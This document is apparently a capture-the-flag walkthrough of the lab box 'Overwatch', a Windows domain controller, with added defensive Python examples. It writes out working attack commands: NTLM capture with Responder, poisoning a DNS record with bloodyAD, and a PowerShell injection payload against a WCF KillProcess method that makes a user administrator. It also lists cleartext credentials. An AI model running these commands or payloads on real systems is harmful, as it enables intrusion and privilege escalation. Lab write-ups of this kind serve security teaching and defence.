This write-up walks through a penetration test of a Windows environment, specifically the Windows domain controller of the box named "Overwatch". Through information gathering, SMB enumeration and Kerberoasting, the tester finds the service account sqlsvc and its credentials. With those credentials the tester attempts further attacks, including DNS poisoning and abuse of an exposed web service interface to execute commands, and finally escalates privileges to obtain administrator access. The article closes with the key lessons learned and how the tools were used.
Information Gathering
# Nmap 7.98 scan initiated Tue Jan 27 16:43:09 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.129.182.219
Nmap scan report for 10.129.182.219
Host is up (0.15s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-27 16:44:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-27T16:45:01+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Issuer: commonName=S200401.overwatch.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-12-07T15:16:06
| Not valid after: 2026-06-08T15:16:06
| MD5: 0da8 f9a5 d788 e363 07b1 5f70 6524 ffcb
| SHA-1: 3287 c62d 4408 7fbb 4038 00b3 32fa da67 fb22 14bc
|_SHA-256: b8ca 73a4 d338 1c57 3558 eec9 d8d1 9381 5b2d e30e 7945 ff69 0565 8935 84da f28a
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/27%Time=6978EB57%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 1.312 days (since Mon Jan 26 09:15:07 2026)
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 1s
| smb2-time:
| date: 2026-01-27T16:44:24
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 27 16:45:05 2026 -- 1 IP address (1 host up) scanned in 116.34 seconds
The target host (IP: 10.129.182.219) is a typical Windows Domain Controller (DC).
- Operating system: Windows Server (most likely Windows Server 2019 or 2022).
- Domain name: overwatch.htb
- Hostname: S200401
- Role: Domain Controller, since it runs Kerberos and LDAP services.
SMB Enumeration
➜ Overwatch nxc smb 10.129.77.116 -u "guest" -p "" --shares
SMB 10.129.77.116 445 S200401 [*] Windows Server 2022 Build 20348 x64 (name:S200401) (domain:overwatch.htb) (signing:True) (SMBv1:False)
SMB 10.129.77.116 445 S200401 [+] overwatch.htb\guest:
SMB 10.129.77.116 445 S200401 [*] Enumerated shares
SMB 10.129.77.116 445 S200401 Share Permissions Remark
SMB 10.129.77.116 445 S200401 ----- ----------- ------
SMB 10.129.77.116 445 S200401 ADMIN$ Remote Admin
SMB 10.129.77.116 445 S200401 C$ Default share
SMB 10.129.77.116 445 S200401 IPC$ READ Remote IPC
SMB 10.129.77.116 445 S200401 NETLOGON Logon server share
SMB 10.129.77.116 445 S200401 software$ READ
SMB 10.129.77.116 445 S200401 SYSVOL Logon server share
In software$ we find overwatch.exe.config, which contains:
- A hidden service endpoint: http://overwatch.htb:8000/MonitorService
- WSDL exposed: httpGetEnabled="True" means we can fetch the service's interface definition (much like API documentation) from http://overwatch.htb:8000/MonitorService?wsdl with a browser or any tool.
- Debug mode enabled: includeExceptionDetailInFaults="True" means that when an error is triggered while interacting with the service, the server returns the full stack trace, which is very helpful during exploitation.
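As an added example (not from the write-up or from overwatch.exe), a small Python audit that reads a WCF config and flags exactly the two settings above, then shows the same config with both turned off. The config text is constructed to resemble what the write-up says overwatch.exe.config contains; the element names (`serviceMetadata`, `serviceDebug`, `baseAddresses`) are the standard WCF ones, while the service name and the file layout are assumptions.

```python
"""Audit a WCF <exe>.config for the two settings found on this box.

Added example, not code from the write-up or from overwatch.exe. The sample
config is constructed; only the two attribute values come from the page.
"""
import xml.etree.ElementTree as ET

# Constructed sample resembling overwatch.exe.config (service name assumed).
SAMPLE_CONFIG = """<configuration>
  <system.serviceModel>
    <services>
      <service name="Overwatch.MonitorService" behaviorConfiguration="MonitorBehavior">
        <host>
          <baseAddresses>
            <add baseAddress="http://overwatch.htb:8000/MonitorService" />
          </baseAddresses>
        </host>
      </service>
    </services>
    <behaviors>
      <serviceBehaviors>
        <behavior name="MonitorBehavior">
          <serviceMetadata httpGetEnabled="True" />
          <serviceDebug includeExceptionDetailInFaults="True" />
        </behavior>
      </serviceBehaviors>
    </behaviors>
  </system.serviceModel>
</configuration>
"""

# Same config with both settings turned off: what a production build should ship.
HARDENED_CONFIG = (SAMPLE_CONFIG
                   .replace('httpGetEnabled="True"', 'httpGetEnabled="False"')
                   .replace('includeExceptionDetailInFaults="True"',
                            'includeExceptionDetailInFaults="False"'))

# (element, attribute) -> why a "True" value matters
RISKY = {
    ("serviceMetadata", "httpGetEnabled"):
        "WSDL/XSD served on ?wsdl: the full interface is visible to anyone who can reach the port",
    ("serviceDebug", "includeExceptionDetailInFaults"):
        "exception details and stack traces are returned to clients inside SOAP faults",
}


def _true(value):
    return value is not None and value.strip().lower() == "true"


def audit_wcf_config(xml_text):
    """Return [(behavior name, element, attribute, reason)] for every risky setting."""
    root = ET.fromstring(xml_text)
    findings = []
    for behavior in root.iter("behavior"):
        bname = behavior.get("name", "(default)")
        for child in behavior:
            for (tag, attr), reason in RISKY.items():
                if child.tag == tag and _true(child.get(attr)):
                    findings.append((bname, tag, attr, reason))
    return findings


def base_addresses(xml_text):
    """Listening URLs declared in the config: where the service is actually exposed."""
    root = ET.fromstring(xml_text)
    return [a.get("baseAddress") for a in root.iter("add") if a.get("baseAddress")]


if __name__ == "__main__":
    for url in base_addresses(SAMPLE_CONFIG):
        print("endpoint:", url)
    for bname, tag, attr, reason in audit_wcf_config(SAMPLE_CONFIG):
        print(f'[{bname}] <{tag} {attr}="True">: {reason}')
    print("hardened config findings:", audit_wcf_config(HARDENED_CONFIG))
```

Run against the real file pulled from the share (`audit_wcf_config(open("overwatch.exe.config").read())`) the output tells you in one line whether the service hands out its contract and its stack traces; both should be "False" outside a developer's machine.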
Download the files locally (in smbclient):
prompt off
mget overwatch.exe overwatch.exe.config overwatch.pdb System.Data.SQLite.dll EntityFramework.dll
Quick reverse-engineering pass
➜ Overwatch strings -e l overwatch.exe | grep -i "pass"
Server=localhost;Database=SecurityLogs;User Id=sqlsvc;Password=TI0LKcfHzZw1Vv;
Validate the credentials sqlsvc:TI0LKcfHzZw1Vv
➜ Overwatch nxc smb 10.129.77.116 -u sqlsvc -p 'TI0LKcfHzZw1Vv' --shares
SMB 10.129.77.116 445 S200401 [*] Windows Server 2022 Build 20348 x64 (name:S200401) (domain:overwatch.htb) (signing:True) (SMBv1:False)
SMB 10.129.77.116 445 S200401 [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv
SMB 10.129.77.116 445 S200401 [*] Enumerated shares
SMB 10.129.77.116 445 S200401 Share Permissions Remark
SMB 10.129.77.116 445 S200401 ----- ----------- ------
SMB 10.129.77.116 445 S200401 ADMIN$ Remote Admin
Kerberoasting
sqlsvc is a service account, so we can attempt Kerberoasting
# Syntax:
# -request: request TGS tickets
# -dc-ip: domain controller IP
# -outputfile: save the captured hashes to a file
impacket-GetUserSPNs overwatch.htb/sqlsvc:TI0LKcfHzZw1Vv -dc-ip 10.129.77.116 -request -outputfile hashes.kerberoast
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
No entries found!
This path leads nowhere.
Run BloodHound
# Collect domain data
bloodhound-python -u sqlsvc -p 'TI0LKcfHzZw1Vv' -d overwatch.htb -c All -ns 10.129.77.116 -dc overwatch.htb --zip
Nothing interesting found.
Full port scan
# Nmap 7.98 scan initiated Thu Jan 29 18:59:58 2026 as: /usr/lib/nmap/nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,6520,9389,49664,49669,50263,50264,59056,59317 -sC -sV -Pn -n -oN scan_results/nmap_details.txt 10.129.7.83
Nmap scan report for 10.129.7.83
Host is up (0.36s latency).
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-29 19:00:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-29T19:01:42+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
| Product_Version: 10.0.20348
|_ System_Time: 2026-01-29T19:01:02+00:00
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Not valid before: 2025-12-07T15:16:06
|_Not valid after: 2026-06-08T15:16:06
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6520/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
| 10.129.7.83:6520:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 6520
| ms-sql-ntlm-info:
| 10.129.7.83:6520:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
|_ Product_Version: 10.0.20348
|_ssl-date: 2026-01-29T19:01:42+00:00; -3s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-29T18:33:05
|_Not valid after: 2056-01-29T18:33:05
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
50263/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
50264/tcp open msrpc Microsoft Windows RPC
59056/tcp open msrpc Microsoft Windows RPC
59317/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/29%Time=697BAE3C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x02\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 1s, median: -1s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-01-29T19:01:03
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan 29 19:01:52 2026 -- 1 IP address (1 host up) scanned in 114.14 seconds
A non-standard SQL Server port is found: 6520
impacket-mssqlclient overwatch.htb/sqlsvc:TI0LKcfHzZw1Vv@10.129.7.83 -windows-auth -p 6520
Login succeeds.
Relay attack
Listen on Kali:
sudo responder -I tun0
In mssql:
xp_dirtree \\10.10.16.219\share
We obtain the hash of OVERWATCH\S200401$ (this is the machine account, hard to crack); cracking attempts yield nothing.
Enumerate linked servers
enum_links reveals SQL07
SQL (OVERWATCH\sqlsvc dbo@overwatch)> use_link SQL07
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "Login timeout expired".
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online.".
ERROR(MSOLEDBSQL): Line 0: Named Pipes Provider: Could not open a connection to SQL Server [64].
Possible causes of this error:
- The target cannot resolve an IP address for SQL07
- The target server is down (so SQL07 cannot be reached)
Exploitation (User Flag)
To exploit this we can:
Add a malicious DNS record (pointing SQL07 at the attacker's IP) -> poison the lookup -> capture and crack the hash
Check sqlsvc's permissions
bloodyAD --host 10.129.8.197 -d overwatch.htb -u sqlsvc -p TI0LKcfHzZw1Vv get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=overwatch,DC=htb
permission: WRITE
distinguishedName: CN=sqlsvc,CN=Users,DC=overwatch,DC=htb
permission: WRITE
distinguishedName: DC=overwatch.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD
distinguishedName: DC=_msdcs.overwatch.htb,CN=MicrosoftDNS,DC=ForestDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD
We can see that sqlsvc has CREATE_CHILD on DomainDnsZones.
Add the malicious DNS record
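As an added example (not from the write-up or from bloodyAD), a short triage script that parses `get writable` output in the format shown above and pulls out exactly the finding that matters here: zones under CN=MicrosoftDNS in which the principal can create child objects. The sample output is copied from the page; the classification rules are this example's own.

```python
"""Triage bloodyAD `get writable` output for DNS-zone create rights.

Added example, not from the write-up or from bloodyAD. WRITABLE_OUTPUT is the
output shown on the page; the zone regex and classification are this example's.
"""
import re

WRITABLE_OUTPUT = """distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=overwatch,DC=htb
permission: WRITE
distinguishedName: CN=sqlsvc,CN=Users,DC=overwatch,DC=htb
permission: WRITE
distinguishedName: DC=overwatch.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD
distinguishedName: DC=_msdcs.overwatch.htb,CN=MicrosoftDNS,DC=ForestDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD
"""

# AD-integrated DNS zone objects live under CN=MicrosoftDNS in one of the
# application partitions; the first RDN is the zone name.
DNS_ZONE_RE = re.compile(
    r"^DC=(?P<zone>[^,]+),CN=MicrosoftDNS,DC=(?P<partition>DomainDnsZones|ForestDnsZones),"
)


def parse_writable(text):
    """Turn 'distinguishedName:' / 'permission:' line pairs into (dn, permission) tuples.
    The permission string is kept exactly as bloodyAD printed it."""
    entries, dn = [], None
    for line in text.splitlines():
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "distinguishedName":
            dn = value
        elif key == "permission" and dn is not None:
            entries.append((dn, value))
            dn = None
    return entries


def dns_zone_findings(entries):
    """Zones in which the principal can create records, as (zone, partition, permission).
    Any name that does not yet exist in such a zone (an unresolvable linked-server
    host, for instance) can be registered by that principal."""
    findings = []
    for dn, perms in entries:
        m = DNS_ZONE_RE.match(dn)
        if m and "CREATE_CHILD" in perms:
            findings.append((m.group("zone"), m.group("partition"), perms))
    return findings


if __name__ == "__main__":
    entries = parse_writable(WRITABLE_OUTPUT)
    print(f"{len(entries)} writable objects")
    for zone, partition, perms in dns_zone_findings(entries):
        print(f"can create DNS records in zone {zone} ({partition}): {perms}")
```

AD-integrated zones grant Authenticated Users the right to create child objects by default, so this finding is common rather than unique to this box; the defensive fixes are tightening that ACE on the zone objects and making sure every linked-server name actually resolves, so that a stale name never becomes a free registration.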
bloodyAD --host 10.129.8.197 -d overwatch.htb -u sqlsvc -p TI0LKcfHzZw1Vv add dnsRecord SQL07 10.10.16.219
[+] SQL07 has been successfully added
Trigger authentication
SQL (OVERWATCH\sqlsvc guest@master)> SELECT * FROM OPENQUERY(SQL07,'SELECT @@VERSION')
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "Communication link failure".
ERROR(MSOLEDBSQL): Line 0: TCP Provider: An existing connection was forcibly closed by the remote host.
Responder yields the hard-coded credentials sqlmgmt:bIhBbzMMnB82yx
evil-winrm -i 10.129.8.197 -u sqlmgmt -p 'bIhBbzMMnB82yx'
Connection successful.
Privilege Escalation (Root Flag)
Earlier we found the overwatch.exe program.
(curl http://localhost:8000/MonitorService?xsd=xsd0 -UseBasicParsing).Content
<?xml version="1.0" encoding="utf-8"?><xs:schema elementFormDefault="qualified" targetNamespace="http://tempuri.org/" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:tns="http://tempuri.org/"><xs:element name="StartMonitoring"><xs:complexType><xs:sequence/></xs:complexType></xs:element><xs:element name="StartMonitoringResponse"><xs:complexType><xs:sequence><xs:element minOccurs="0" name="StartMonitoringResult" nillable="true" type="xs:string"/></xs:sequence></xs:complexType></xs:element><xs:element name="StopMonitoring"><xs:complexType><xs:sequence/></xs:complexType></xs:element><xs:element name="StopMonitoringResponse"><xs:complexType><xs:sequence><xs:element minOccurs="0" name="StopMonitoringResult" nillable="true" type="xs:string"/></xs:sequence></xs:complexType></xs:element><xs:element name="KillProcess"><xs:complexType><xs:sequence><xs:element minOccurs="0" name="processName" nillable="true" type="xs:string"/></xs:sequence></xs:complexType></xs:element><xs:element name="KillProcessResponse"><xs:complexType><xs:sequence><xs:element minOccurs="0" name="KillProcessResult" nillable="true" type="xs:string"/></xs:sequence></xs:complexType></xs:element></xs:schema>
From the xsd=xsd0 output we can clearly see the methods the service exposes:
- StartMonitoring (no parameters)
- StopMonitoring (no parameters)
- KillProcess (parameter: processName, type: string)
Decompile the program with dnSpy
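As an added example (not part of the write-up), a Python parser that derives the operation list above from the `?xsd=xsd0` schema instead of reading the XML by eye, and then points at the operations that accept string input, which is where an injection review starts. XSD0 is the schema the write-up fetched, copied from the page; the request/response pairing rule relies on how WCF's default serialiser names its wrapper elements and is this example's own logic.

```python
"""List the operations a WCF/SOAP service exposes from its ?xsd=xsd0 schema.

Added example, not part of the write-up. XSD0 is the schema the write-up
fetched (copied from the page); everything else is this example's own logic.
"""
import xml.etree.ElementTree as ET

XS = "{http://www.w3.org/2001/XMLSchema}"

XSD0 = ('<?xml version="1.0" encoding="utf-8"?>'
        '<xs:schema elementFormDefault="qualified" targetNamespace="http://tempuri.org/" '
        'xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:tns="http://tempuri.org/">'
        '<xs:element name="StartMonitoring"><xs:complexType><xs:sequence/></xs:complexType></xs:element>'
        '<xs:element name="StartMonitoringResponse"><xs:complexType><xs:sequence>'
        '<xs:element minOccurs="0" name="StartMonitoringResult" nillable="true" type="xs:string"/>'
        '</xs:sequence></xs:complexType></xs:element>'
        '<xs:element name="StopMonitoring"><xs:complexType><xs:sequence/></xs:complexType></xs:element>'
        '<xs:element name="StopMonitoringResponse"><xs:complexType><xs:sequence>'
        '<xs:element minOccurs="0" name="StopMonitoringResult" nillable="true" type="xs:string"/>'
        '</xs:sequence></xs:complexType></xs:element>'
        '<xs:element name="KillProcess"><xs:complexType><xs:sequence>'
        '<xs:element minOccurs="0" name="processName" nillable="true" type="xs:string"/>'
        '</xs:sequence></xs:complexType></xs:element>'
        '<xs:element name="KillProcessResponse"><xs:complexType><xs:sequence>'
        '<xs:element minOccurs="0" name="KillProcessResult" nillable="true" type="xs:string"/>'
        '</xs:sequence></xs:complexType></xs:element>'
        '</xs:schema>')


def list_operations(xsd_text):
    """Map each request element to its [(parameter name, XSD type)] list.

    WCF's default contract serialiser emits one top-level element per operation
    and one '<Op>Response' element wrapping its return value; the pairing below
    relies on that convention and skips the response wrappers."""
    root = ET.fromstring(xsd_text.encode("utf-8"))
    top = {el.get("name"): el for el in root.findall(XS + "element")}
    ops = {}
    for name, el in top.items():
        if name.endswith("Response") and name[:-len("Response")] in top:
            continue  # return-value wrapper, not an operation
        ops[name] = [(p.get("name"), p.get("type"))
                     for p in el.findall(".//" + XS + "element")]
    return ops


def operations_with_string_input(ops):
    """Operations taking at least one xs:string parameter: the first place to
    review when the implementation builds commands, queries or scripts."""
    return sorted(op for op, params in ops.items()
                  if any(t == "xs:string" for _, t in params))


if __name__ == "__main__":
    ops = list_operations(XSD0)
    for op, params in ops.items():
        shown = ", ".join(f"{n}: {t}" for n, t in params) or "no parameters"
        print(f"{op}({shown})")
    print("string input:", operations_with_string_input(ops))
```

On this service the string-input list is just KillProcess, which is exactly the method the decompilation below shows building a PowerShell script from its argument.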
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;

// Decompiled from overwatch.exe. processName is concatenated straight into
// PowerShell script text, so a value containing ';' runs additional commands.
public string KillProcess(string processName)
{
    string scriptContents = "Stop-Process -Name " + processName + " -Force";
    string result;
    try
    {
        using (Runspace runspace = RunspaceFactory.CreateRunspace())
        {
            runspace.Open();
            using (Pipeline pipeline = runspace.CreatePipeline())
            {
                pipeline.Commands.AddScript(scriptContents); // injection point: parsed as script
                pipeline.Commands.Add("Out-String");
                Collection<PSObject> collection = pipeline.Invoke();
                runspace.Close();
                StringBuilder stringBuilder = new StringBuilder();
                foreach (PSObject psobject in collection)
                {
                    stringBuilder.AppendLine(psobject.ToString());
                }
                result = stringBuilder.ToString();
            }
        }
    }
    catch (Exception ex)
    {
        // The catch block was cut off in the decompiled output shown here; this
        // minimal handler is assumed so the method compiles. With
        // includeExceptionDetailInFaults="True" the exception reaches the client anyway.
        result = ex.Message;
    }
    return result;
}
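As an added example (not code from the write-up or from overwatch.exe), the same command construction modelled in Python: the vulnerable builder pastes the caller's string into script text exactly as the decompiled method does, while the hardened builder validates the name against an allowlist and keeps it as a discrete argument. In the real C# service the equivalent fix is to replace `AddScript(scriptContents)` with a `Command("Stop-Process")` object whose `Parameters.Add("Name", processName)` carries the value, so PowerShell never parses the caller's input as script. The regex and the 64-character limit are this example's assumptions.

```python
"""Vulnerable vs. hardened construction of the Stop-Process call from KillProcess.

Added example, not from the write-up or from overwatch.exe. The allowlist
regex and the 64-character limit are assumptions made for this example.
"""
import re

# Stop-Process -Name takes an image name without path or extension; anything
# outside this character set has no business in it (assumed policy for this service).
PROCESS_NAME_RE = re.compile(r"[A-Za-z0-9_.\-]{1,64}")


class InvalidProcessName(ValueError):
    """Raised instead of running anything when the name fails validation."""


def build_script_vulnerable(process_name):
    """Mirror of the decompiled KillProcess: caller input becomes script text."""
    return "Stop-Process -Name " + process_name + " -Force"


def build_command_hardened(process_name):
    """Validated name passed as a discrete argument. This is what
    Command + Parameters.Add gives you in C#: the value is never parsed as
    script, so ';', '|', '`', '$(' or '#' cannot change control flow."""
    if not isinstance(process_name, str) or not PROCESS_NAME_RE.fullmatch(process_name):
        raise InvalidProcessName(f"rejected process name: {process_name!r}")
    return ["Stop-Process", "-Name", process_name, "-Force"]


# Characters that turn a "process name" into extra statements or subexpressions.
INJECTION_CHARS = re.compile(r"[;|&`$(){}#\r\n]")


def looks_injected(script):
    """Detection heuristic for logs or SOAP faults that echo the script text."""
    return INJECTION_CHARS.search(script) is not None


if __name__ == "__main__":
    # Input from the write-up: a real name followed by an injected statement.
    payload = "notepad; net localgroup administrators sqlmgmt /add; #"
    for name in ("notepad", payload):
        script = build_script_vulnerable(name)
        print("vulnerable ->", script, "| injected:", looks_injected(script))
        try:
            print("hardened   ->", build_command_hardened(name))
        except InvalidProcessName as exc:
            print("hardened   ->", exc)
```

Validation alone is not the whole fix: even a clean name reaches `Stop-Process` running as the service account, so the service should also run as a least-privilege identity and the endpoint should require authentication rather than answer anyone who can reach port 8000.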
$ws = New-WebServiceProxy -Uri "http://localhost:8000/MonitorService?wsdl"
$ws.KillProcess("notepad; net localgroup administrators sqlmgmt /add; #")
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
sqlmgmt
The command completed successfully.
Log out and log back in for the new group membership to take effect.
Lessons Learned
WSDL: https://www.ibm.com/docs/zh-tw/app-connect/11.0.0?topic=overview-querying-wsdl-wsdl
SOAP: https://www.runoob.com/soap/soap-syntax.html